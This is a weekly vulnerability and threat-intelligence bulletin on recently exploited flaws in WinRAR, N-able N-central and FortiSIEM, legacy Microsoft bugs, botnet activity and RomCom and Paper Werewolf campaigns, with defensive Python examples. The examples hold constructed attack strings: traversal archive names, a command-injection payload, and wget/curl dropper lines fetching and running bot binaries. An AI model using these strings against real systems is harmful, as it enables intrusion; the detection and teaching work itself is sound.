Executive Summary
This week’s threat landscape underscores the persistent risks posed by both historic and emerging vulnerabilities. CISA added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, including two decades-old Microsoft bugs, a newly discovered WinRAR flaw, and two critical issues in N-able N-central, a widely used remote monitoring and management (RMM) platform. Meanwhile, Fortinet confirmed that an exploit for its critical FortiSIEM vulnerability is actively circulating in the wild. These developments highlight how attackers continue to target both legacy weaknesses and freshly disclosed flaws, reinforcing the urgent need for timely patching and proactive defense.
On the botnet front, activity spiked as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st launched aggressive campaigns exploiting flaws in GitLab, Cloud Gateway, and PHP-based applications. Meanwhile, IoT botnets such as Mirai, Bashlite, Tsunami, and BrickerBot targeted exposed Eir D1000 routers, using mass exploitation to gain footholds and move laterally within enterprise networks.
Malware campaigns this week spotlighted WinRAR exploits, with RomCom weaponizing a recently discovered zero-day in targeted phishing, and Paper Werewolf leveraging it alongside an additional WinRAR vulnerability in their attacks.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.
CVE-2025-8088
A Path Traversal Vulnerability in RARLAB WinRAR, affecting the Windows version up to and including 7.12, allows an attacker to craft an archive whose entries are written outside the chosen extraction directory; dropping a file into a location such as the user's Startup folder turns this into arbitrary code execution the next time the user logs in. Assigned a high CVSS Score of 8.4, this flaw was exploited as a zero-day in the wild before being patched in WinRAR version 7.13. Due to its active exploitation, the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency for users to update to the latest version.
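The check an extractor has to make against this class of bug, as an added example that is not WinRAR's code or part of the original bulletin: every entry name is normalised and rejected if it escapes the destination. Because the standard library has no RAR parser, the example builds a ZIP in memory as a stand-in (an assumption of the example; the entry names are constructed, not taken from a real sample), and it treats backslashes, drive letters and NTFS alternate-data-stream colons as hostile, since a Windows extractor would honour them.

```python
"""Added example: reject archive members whose names escape the extraction
directory (the path-traversal class behind the WinRAR flaw above).
Python's stdlib zipfile stands in for RAR here; this is illustrative code,
not WinRAR's extractor and not part of the original bulletin."""
import io
import posixpath
import zipfile


def is_unsafe_member(name: str) -> bool:
    """Return True if an archive entry name must not be extracted.

    Rules a Windows-side extractor should apply:
      * absolute paths ("/etc/..", "\\\\server\\share")
      * drive letters ("C:\\...") and NTFS alternate data streams ("file.txt:x"),
        both of which carry a ':'
      * any ".." component, splitting on both "/" and "\\"
      * empty names or names that normalise to nothing
    """
    if not name:
        return True
    unified = name.replace("\\", "/")   # Windows extractors accept both separators
    if ":" in unified:
        return True
    if unified.startswith("/"):
        return True
    parts = [p for p in unified.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return True
    return False


def safe_extract(zip_bytes: bytes, dest: str) -> tuple[list[str], list[str]]:
    """Walk an in-memory ZIP and return (accepted, rejected) member names.

    Nothing is written to disk; the decision is what matters. `dest` is used
    for the usual resolved-path check so the function mirrors a real extractor.
    """
    accepted, rejected = [], []
    dest_norm = posixpath.normpath(dest.replace("\\", "/"))
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_unsafe_member(name):
                rejected.append(name)
                continue
            # Belt and braces: the resolved target must still sit under dest.
            target = posixpath.normpath(
                posixpath.join(dest_norm, name.replace("\\", "/")))
            if target.startswith(dest_norm + "/"):
                accepted.append(name)
            else:
                rejected.append(name)
    return accepted, rejected


def build_sample_archive() -> bytes:
    """Constructed test archive (not a real malicious sample): one benign entry
    plus the kinds of traversal names a hostile archive might carry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 benign")
        zf.writestr("..\\..\\AppData\\Roaming\\Microsoft\\Windows\\"
                    "Start Menu\\Programs\\Startup\\update.lnk", b"lnk")
        zf.writestr("../../../tmp/evil.exe", b"MZ")
        zf.writestr("C:\\Windows\\Temp\\payload.dll", b"MZ")
        zf.writestr("notes.txt:hidden.exe", b"MZ")
    return buf.getvalue()


if __name__ == "__main__":
    ok, bad = safe_extract(build_sample_archive(),
                           "C:/Users/victim/Downloads/extract")
    print("accepted:", ok)
    print("rejected:", bad)
```

The same two-stage check (syntactic rejection of the name, then a resolved-path containment test) applies to any archive format; the syntactic stage matters because a pure `normpath` test on a POSIX host would not see a backslash-separated `..\..` as traversal at all.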
CVE-2025-8875 and CVE-2025-8876
Two critical vulnerabilities were identified in N-able N-central, a remote monitoring and management (RMM) platform widely used by Managed Service Providers (MSPs).
The first, CVE-2025-8875, is an Insecure Deserialization flaw that could lead to arbitrary command execution, while the second, CVE-2025-8876, is a Command Injection Vulnerability arising from improper sanitization of user input, allowing attackers to run arbitrary commands on the system. Both vulnerabilities are fixed in N-central 2025.3.1 and 2024.6 HF2. They have also been added to the CISA KEV catalog, indicating active exploitation and highlighting the urgency for organizations to update immediately.
CVE-2025-25256
A Command Injection Vulnerability in Fortinet FortiSIEM, a widely used Security Information and Event Management (SIEM) platform, allows remote, unauthenticated attackers to execute arbitrary code or system commands. Rated critical with a CVSS Score of 9.8, the flaw arises from improper neutralization of special elements in OS commands, enabling exploitation through crafted CLI requests. With functional exploit code already in the wild, unpatched FortiSIEM instances face severe risk. Fortinet has released patched versions in its advisory and strongly urges immediate upgrades to mitigate active threats.
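Both the N-central CVE-2025-8876 and the FortiSIEM CVE-2025-25256 entries above describe the same root cause, improper neutralization of special elements in an OS command (CWE-78). The following is an added, illustrative example of that pattern and two ways to fix it; it is not code from either product, and the `host` parameter and the diagnostic command it builds are assumptions chosen for the demonstration.

```python
"""Added example: an OS command built from untrusted input (the CWE-78 pattern
behind the N-central and FortiSIEM bugs), beside two hardened versions.
Illustrative only; not taken from N-able or Fortinet code. Commands are
built but never executed, so the script is safe to run anywhere."""
import re
import shlex

# Allow-list for a hostname or IPv4 literal: letters, digits, dots, hyphens.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def build_unsafe(host: str) -> str:
    """Vulnerable: the caller's input is spliced into a shell command line.
    Handed to a shell (subprocess with shell=True, system(), popen()),
    ';', '|', '&&', '$()' and backticks inside `host` are interpreted."""
    return f"ping -c 1 {host}"


def build_quoted(host: str) -> str:
    """Mitigation 1: shlex.quote() wraps the value in single quotes so the
    shell sees one literal word. Adequate only when the consumer really is a
    POSIX shell and the value is never re-expanded downstream."""
    return f"ping -c 1 {shlex.quote(host)}"


def build_argv(host: str) -> list[str]:
    """Mitigation 2 (preferred): validate against an allow-list, refuse values
    that look like options, then pass an argv list so no shell is involved.
    The list form is what subprocess.run(argv) would receive."""
    if not HOSTNAME_RE.fullmatch(host) or host.startswith("-"):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    payload = "8.8.8.8; id"          # constructed injection attempt
    print("unsafe  :", build_unsafe(payload))    # 'id' would run as a second command
    print("quoted  :", build_quoted(payload))    # one quoted argument, ping fails harmlessly
    try:
        build_argv(payload)
    except ValueError as e:
        print("argv    :", e)                    # rejected before any command exists
    print("argv ok :", build_argv("example.com"))
```

The `startswith("-")` check is the part most often forgotten: even with an argv list and no shell, a value such as `-f` becomes an option to the program being run, which is argument injection rather than command injection but is exploitable in its own right.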
CVE-2013-3893
A Resource Management Errors Vulnerability in Microsoft Internet Explorer, stemming from a use-after-free flaw in the SetMouseCapture implementation within mshtml.dll, allowed remote code execution and was exploited as a zero-day back in 2013. Affecting IE 6 through 11 on Windows XP to Windows 8.1, it let attackers trigger the bug from malicious JavaScript; observed exploits used an ms-help: URL to load the non-ASLR hxds.dll from Microsoft Office and execute arbitrary code. The flaw was leveraged in targeted attacks against high-profile organizations in Japan, highlighting its geopolitical significance. Although patched in 2013, and although Microsoft officially ended Internet Explorer support in 2022, the vulnerability has now been added to the CISA KEV catalog, underscoring that legacy systems still running IE remain exposed.
CVE-2007-0671
A Remote Code Execution Vulnerability in Microsoft Office Excel allowed attackers to compromise systems by enticing users to open specially crafted Excel files. These malicious files, delivered via email attachments or hosted on compromised websites, could trigger code execution on the affected system upon opening. Exploited as a zero-day at the time, the flaw impacted Microsoft Excel 2000, XP, 2003, and 2004 for Mac, with potential implications for other Office components. Microsoft addressed the issue through a dedicated security bulletin, urging immediate updates to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its exploitation history and the need for patching.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. We present the top 5 CVEs whose payloads are suggestive of botnet activity, such as invoking wget against a bare IP address.
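The heuristic described here (a downloader such as wget or curl pointed at a literal IP address, usually followed by chmod and execution) is easy to apply to sensor telemetry. The following is an added example of that triage logic, not Cytellite's own code; the request lines it runs over are constructed for the example using RFC 5737 documentation addresses, not real telemetry, and the `src METHOD path` line format is an assumption.

```python
"""Added example: flag HTTP request payloads that look like botnet droppers
(wget/curl/tftp fetching from a bare IPv4 address). Illustrative triage code,
not Cytellite's pipeline; all log lines below are constructed."""
import re
from typing import Optional
from urllib.parse import unquote_plus

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

# A downloader, then anything up to a command separator, then a literal IPv4
# with optional scheme, port and path.
DOWNLOADER = re.compile(
    rf"\b(?:wget|curl|tftp|ftpget)\b[^;|&`]*?"
    rf"(?:https?://|tftp://)?(?P<ip>{IPV4})(?::\d+)?(?P<path>/[^\s;|&`]*)?",
    re.IGNORECASE,
)

# Signs the fetched file is meant to run: chmod, a pipe into a shell,
# "; sh x", or a ./binary invocation.
EXEC_HINTS = re.compile(
    r"chmod\s+\+?[0-7x]+|\|\s*(?:ba)?sh\b|;\s*(?:ba)?sh\s+\S|\./\S+",
    re.IGNORECASE,
)


def classify(raw_request: str) -> Optional[dict]:
    """Decode URL-encoding twice (dropper payloads are often double-encoded),
    then look for a downloader aimed at a literal IPv4. Returns the extracted
    indicators, or None when the heuristic does not fire."""
    decoded = unquote_plus(unquote_plus(raw_request))
    m = DOWNLOADER.search(decoded)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "path": m.group("path") or "/",
        "executes": bool(EXEC_HINTS.search(decoded)),
    }


def scan(lines: list[str]) -> list[dict]:
    """Apply classify() to 'src METHOD path' lines; return one dict per hit."""
    hits = []
    for line in lines:
        src, _, request = line.partition(" ")
        indicators = classify(request)
        if indicators:
            hits.append({"src": src, **indicators})
    return hits


# Constructed sample log (RFC 5737 addresses), not sensor data.
SAMPLE_LOG = [
    # classic IoT dropper chain stuffed into the path
    "198.51.100.7 GET /cgi-bin/;wget%20http://203.0.113.9/bins/mirai.arm;chmod%20777%20mirai.arm;./mirai.arm",
    # curl piped straight into a shell, double URL-encoded
    "198.51.100.8 POST /api/run?cmd=curl%2520-s%2520http%253A%252F%252F203.0.113.10%253A8080%252Fx.sh%257Csh",
    # benign
    "198.51.100.9 GET /index.php?page=home",
    # downloader aimed at a hostname, not an IP: outside this heuristic
    "198.51.100.10 GET /health?check=wget%20https://updates.example.com/agent",
    # tftp fetch with no visible execution step
    "198.51.100.11 GET /setup.cgi?cmd=tftp%20-g%20-r%20x.sh%20203.0.113.11",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The `executes` flag is what separates a scanner that merely probes for the bug from one that is actually staging a bot, and the IP captured in `ip` is the distribution server worth pivoting on; the hostname-based fetch in the fourth line is deliberately left unflagged, which is the known blind spot of this particular heuristic.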
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually reviewed and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2025-6218 and CVE-2025-8088
ESET reported that CVE-2025-8088 is being actively exploited as a zero-day in spear-phishing campaigns by the RomCom group (aka Storm-0978, Tropical Scorpius, or UNC2596) to deploy a SnipBot variant, RustyClaw, and Mythic agent backdoors. RomCom, a Russian-linked threat actor involved in ransomware, data-theft extortion, and credential-stealing operations, is known for leveraging zero-day vulnerabilities and building custom malware for data theft, persistence, and backdoor access.
In a separate activity cluster, BI.ZONE reported that both CVE-2025-6218 and CVE-2025-8088 have also been exploited by the Paper Werewolf group. Active since 2022, Paper Werewolf targets Russian organizations through phishing emails carrying malicious macros, which deploy tools such as PowerRAT for remote access and data exfiltration.
PRE-NVD observed for this week
This refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2025/08/12/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/08/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.fortiguard.com/psirt/FG-IR-25-152
- https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-1/
- https://bi.zone/expertise/blog/paper-werewolf-atakuet-rossiyu-s-ispolzovaniem-uyazvimosti-nulevogo-dnya-v-winrar/
- https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
- https://securityonline.info/winrar-update-zero-day-path-traversal-flaw-cve-2025-8088-actively-exploited-to-deliver-malware/